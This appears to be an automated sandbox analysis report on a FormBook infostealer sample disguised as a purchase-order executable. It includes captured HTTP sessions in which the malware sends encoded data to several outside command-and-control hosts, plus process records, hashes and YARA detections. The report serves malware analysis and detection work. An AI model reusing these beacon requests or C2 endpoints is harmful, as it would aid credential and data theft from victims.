                                                    25 | 192.168.2.8 | 63717 | 3.33.130.190 | 80 | 6360 | C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 24, 2024 17:18:55.842067957 CEST | 728 | OUT | POST /i5ct/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.airtech365.net
                                                    Origin: http://www.airtech365.net
                                                    Referer: http://www.airtech365.net/i5ct/
                                                    Content-Length: 205
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    26 | 192.168.2.8 | 63718 | 3.33.130.190 | 80 | 6360 | C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 24, 2024 17:18:58.386401892 CEST | 748 | OUT | POST /i5ct/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.airtech365.net
                                                    Origin: http://www.airtech365.net
                                                    Referer: http://www.airtech365.net/i5ct/
                                                    Content-Length: 225
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    27 | 192.168.2.8 | 63719 | 3.33.130.190 | 80 | 6360 | C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 24, 2024 17:19:00.932589054 CEST | 1765 | OUT | POST /i5ct/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.airtech365.net
                                                    Origin: http://www.airtech365.net
                                                    Referer: http://www.airtech365.net/i5ct/
                                                    Content-Length: 1241
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    28 | 192.168.2.8 | 63720 | 3.33.130.190 | 80 | 6360 | C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 24, 2024 17:19:03.475888968 CEST | 461 | OUT | GET /i5ct/?L4Ml=Fa741987AWI4ml8JbykgJhLldRSV8MLMClq6YX0bCrkU+JaoPzqjDuf6Icle9aauT7Lw6ndlbIEz9rGtX42qIZx9WxYPHsy+7TyOZv7jOElLtueXdtfrjEJRdY8SctMF/g==&VX=XZGx- HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Host: www.airtech365.net
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:19:03.958303928 CEST | 401 | IN | HTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Tue, 24 Sep 2024 15:19:03 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 261
                                                    Connection: close
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?L4Ml=Fa741987AWI4ml8JbykgJhLldRSV8MLMClq6YX0bCrkU+JaoPzqjDuf6Icle9aauT7Lw6ndlbIEz9rGtX42qIZx9WxYPHsy+7TyOZv7jOElLtueXdtfrjEJRdY8SctMF/g==&VX=XZGx-"}</script></head></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    29 | 192.168.2.8 | 63721 | 52.223.13.41 | 80 | 6360 | C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 24, 2024 17:19:17.435568094 CEST | 746 | OUT | POST /8q1d/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.longfilsalphonse.net
                                                    Origin: http://www.longfilsalphonse.net
                                                    Referer: http://www.longfilsalphonse.net/8q1d/
                                                    Content-Length: 205
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    30 | 192.168.2.8 | 63722 | 52.223.13.41 | 80 | 6360 | C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 24, 2024 17:19:19.983783960 CEST | 766 | OUT | POST /8q1d/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.longfilsalphonse.net
                                                    Origin: http://www.longfilsalphonse.net
                                                    Referer: http://www.longfilsalphonse.net/8q1d/
                                                    Content-Length: 225
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    31 | 192.168.2.8 | 63723 | 52.223.13.41 | 80 | 6360 | C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 24, 2024 17:19:22.622394085 CEST | 1783 | OUT | POST /8q1d/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.longfilsalphonse.net
                                                    Origin: http://www.longfilsalphonse.net
                                                    Referer: http://www.longfilsalphonse.net/8q1d/
                                                    Content-Length: 1241
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    32 | 192.168.2.8 | 63724 | 52.223.13.41 | 80 | 6360 | C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 24, 2024 17:19:25.270358086 CEST | 467 | OUT | GET /8q1d/?L4Ml=VzkWYQIqZCqyTa6CmCFXa3qoYwUD4s1ffSppgJrtVCF0SNpQYrHA+vb9V0hsreptvR0arq5HmwRiZDuL2EbfxnsbQ7dD9aDlq4oQdTdM2Qj2g6a0bpEWwWIB7x6JldQNMQ==&VX=XZGx- HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Host: www.longfilsalphonse.net
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:19:25.918009996 CEST | 401 | IN | HTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Tue, 24 Sep 2024 15:19:25 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 261
                                                    Connection: close
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?L4Ml=VzkWYQIqZCqyTa6CmCFXa3qoYwUD4s1ffSppgJrtVCF0SNpQYrHA+vb9V0hsreptvR0arq5HmwRiZDuL2EbfxnsbQ7dD9aDlq4oQdTdM2Qj2g6a0bpEWwWIB7x6JldQNMQ==&VX=XZGx-"}</script></head></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    33 | 192.168.2.8 | 63725 | 38.47.232.144 | 80 | 6360 | C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 24, 2024 17:19:31.424901962 CEST | 713 | OUT | POST /wqu9/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.yu35n.top
                                                    Origin: http://www.yu35n.top
                                                    Referer: http://www.yu35n.top/wqu9/
                                                    Content-Length: 205
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Ascii: L4Ml=QBSjsgWvRN45k0ku1nplkvuKrNRJs38d6igZnv+XeVKO2Jpq/WOqKJtcnLl2CCxofoqEH7+yuPEHZOq0CbWgJpDV3MMQLSclsBK15WC2lU8rwb79BQnCJdBTZJXZreCeNKrPFfhBfBAypoLehr1MZavxv6+FvprashLjghil4YYgEceG1imjTEqEJ4jAV0W//TillQU=
                                                    Sep 24, 2024 17:19:32.421530962 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Tue, 24 Sep 2024 15:19:32 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 148
                                                    Connection: close
                                                    ETag: "66ea4ae9-94"
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    34 | 192.168.2.8 | 63726 | 38.47.232.144 | 80 | 6360 | C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 24, 2024 17:19:33.994790077 CEST | 733 | OUT | POST /wqu9/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.yu35n.top
                                                    Origin: http://www.yu35n.top
                                                    Referer: http://www.yu35n.top/wqu9/
                                                    Content-Length: 225
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Ascii: L4Ml=QBSjsgWvRN451k0u6gFlzfuJntRJnX8Z6isZnqG5egSO1rxq8XOqJJtcvrl3NixZfom2H7CyuOgHZMi0CMKnP5DX8sMWPSclsBK15WHjlQYrxrr9A1LBD9BQJ5XZm+CaNKqaFeNnfD4ypsDeh+BNSavNjq/snJayuXmNiw2+4KdEFqzsvAulQECvJ7L2QDLXlwyV7HAFXj3KQfIYGGuOGAySp3PV
                                                    Sep 24, 2024 17:19:34.938363075 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Tue, 24 Sep 2024 15:19:34 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 148
                                                    Connection: close
                                                    ETag: "66ea4ae9-94"
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                    35 | 192.168.2.8 | 63727 | 38.47.232.144 | 80
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 24, 2024 17:19:36.974090099 CEST | 1750 | OUT | POST /wqu9/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.yu35n.top
                                                    Origin: http://www.yu35n.top
                                                    Referer: http://www.yu35n.top/wqu9/
                                                    Content-Length: 1241
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:19:38.168473005 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Tue, 24 Sep 2024 15:19:37 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 148
                                                    Connection: close
                                                    ETag: "66ea4ae9-94"
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                    36 | 192.168.2.8 | 63728 | 38.47.232.144 | 80
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 24, 2024 17:19:39.561570883 CEST | 456 | OUT | GET /wqu9/?L4Ml=dD6DvXSgWvkhkExz9ANGg62vkcZOvm8u+S0LjtafD2Cb45k+h0GLDfxxrLcTCDpid42VLL2gjPURfP6UcdvjDLDV680rGTEuq0qU4X+foBMe6t+yESiAaeFaZa7j0sbyXQ==&VX=XZGx- HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Host: www.yu35n.top
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:19:40.562958956 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Tue, 24 Sep 2024 15:19:40 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 148
                                                    Connection: close
                                                    ETag: "66ea4ae9-94"
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Target ID:0
                                                    Start time:11:16:26
                                                    Start date:24/09/2024
                                                    Path:C:\Users\user\Desktop\PO-000001488.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\PO-000001488.exe"
                                                    Imagebase:0xca0000
                                                    File size:892'928 bytes
                                                    MD5 hash:DDC551BB780301787EE4CC982AF331A9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:11:16:40
                                                    Start date:24/09/2024
                                                    Path:C:\Users\user\Desktop\PO-000001488.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\PO-000001488.exe"
                                                    Imagebase:0x8c0000
                                                    File size:892'928 bytes
                                                    MD5 hash:DDC551BB780301787EE4CC982AF331A9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1769630236.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1769630236.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1770519170.0000000003FF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1770519170.0000000003FF0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:11:16:52
                                                    Start date:24/09/2024
                                                    Path:C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe"
                                                    Imagebase:0x4b0000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:8
                                                    Start time:11:16:54
                                                    Start date:24/09/2024
                                                    Path:C:\Windows\SysWOW64\userinit.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\userinit.exe"
                                                    Imagebase:0xf80000
                                                    File size:45'568 bytes
                                                    MD5 hash:24892AC6E39679E3BD3B0154DE97C53A
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3308944674.0000000003080000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3308944674.0000000003080000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3308999188.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3308999188.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:low
                                                    Has exited:false

                                                    Target ID:9
                                                    Start time:11:17:06
                                                    Start date:24/09/2024
                                                    Path:C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe"
                                                    Imagebase:0x4b0000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3311216289.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3311216289.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:12
                                                    Start time:11:17:23
                                                    Start date:24/09/2024
                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                    Imagebase:0x7ff6d20e0000
                                                    File size:676'768 bytes
                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                      Execution Graph

                                                      Execution Coverage:8.4%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:39
                                                      Total number of Limit Nodes:3

                                                      Control-flow Graph

                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 0158D0DE
                                                      • GetCurrentThread.KERNEL32 ref: 0158D11B
                                                      • GetCurrentProcess.KERNEL32 ref: 0158D158
                                                      • GetCurrentThreadId.KERNEL32 ref: 0158D1B1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1601647700.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1580000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: bf01eeb2518f1a3a8a135ba7aca4b66f059dbd2ca2467bb864d5e54651db04c2
                                                      • Instruction ID: 6cbe84d567b5c1011520cf479346f171a2d0745b73f9d0755d5af8521f530779
                                                      • Opcode Fuzzy Hash: bf01eeb2518f1a3a8a135ba7aca4b66f059dbd2ca2467bb864d5e54651db04c2
                                                      • Instruction Fuzzy Hash: 435157B0901349CFEB14EFA9D54879EBBF1BF88314F208459E419B7290DB399944CF65

                                                      Control-flow Graph

                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 0158D0DE
                                                      • GetCurrentThread.KERNEL32 ref: 0158D11B
                                                      • GetCurrentProcess.KERNEL32 ref: 0158D158
                                                      • GetCurrentThreadId.KERNEL32 ref: 0158D1B1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1601647700.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1580000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: 8b6eb49cf6efa3e6d244c6186652ffd3da18050cad73b6f3736c846fb08dabf3
                                                      • Instruction ID: 410652ff3c64f52692e8638086e35cf1efb0f16fd409055b76c85b9d6eceecdb
                                                      • Opcode Fuzzy Hash: 8b6eb49cf6efa3e6d244c6186652ffd3da18050cad73b6f3736c846fb08dabf3
                                                      • Instruction Fuzzy Hash: BD5157B090130ACFEB54EFAAD548B9EBBF1BF88314F208419E419B7290DB395944CF65

                                                      Control-flow Graph

                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0158B01E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1601647700.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1580000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 0b2ed524e12a291cc5629dd9b84263384ec447ebfcb39ef93c929f78d759b57a
                                                      • Instruction ID: d1c3717bc45fa2a505e2827e441e71070a3a271697bb2b5c2ad3c3d19509c8d9
                                                      • Opcode Fuzzy Hash: 0b2ed524e12a291cc5629dd9b84263384ec447ebfcb39ef93c929f78d759b57a
                                                      • Instruction Fuzzy Hash: 71713870A00B068FD724EF29D44475ABBF1FF88200F108A2ED596EBB90D775E845CB91

                                                      Control-flow Graph

                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 015859C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1601647700.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1580000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 9243a43acfec6f5ee2775a196a0f74cb312545dfa378afb869ebbc2387c5e903
                                                      • Instruction ID: 31b8bfdf3d46b9db81332dc4d9ce763245df5c0aedc0e04702cb339fd1ef4475
                                                      • Opcode Fuzzy Hash: 9243a43acfec6f5ee2775a196a0f74cb312545dfa378afb869ebbc2387c5e903
                                                      • Instruction Fuzzy Hash: 0141FEB1C01319CFDB24DFA9C884BCEBBB1BF89714F20815AD508AB255DB756945CF90

                                                      Control-flow Graph

                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 015859C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1601647700.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1580000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 38c87ed7df69fdef1711a543cbf535347b772ec9b4ccd8bc2d47f7c1f0a311e9
                                                      • Instruction ID: 66e9b225df0df0e5d6049be82eb3e16b319f1679c41cc26e70c4cb806c27cbe3
                                                      • Opcode Fuzzy Hash: 38c87ed7df69fdef1711a543cbf535347b772ec9b4ccd8bc2d47f7c1f0a311e9
                                                      • Instruction Fuzzy Hash: 3141DF70C0071DCBDB24EFA9C88478EBBF5BB49714F20806AD508AB255DB756945CF90

                                                      Control-flow Graph

                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0158D737
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1601647700.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1580000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 312dfeac3b656d49acf9e3b1caab5462c6034579c3e57ef70ff40e82a5152e4b
                                                      • Instruction ID: 2ffad1557db311120ef69e20efe43e6d00645fdf2aa46a6282670ecafe155040
                                                      • Opcode Fuzzy Hash: 312dfeac3b656d49acf9e3b1caab5462c6034579c3e57ef70ff40e82a5152e4b
                                                      • Instruction Fuzzy Hash: C721E4B5900249DFDB10DFAAD884ADEBFF9FB48310F14841AE914A7350D378A940CFA5

                                                      Control-flow Graph

                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0158D737
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1601647700.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1580000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
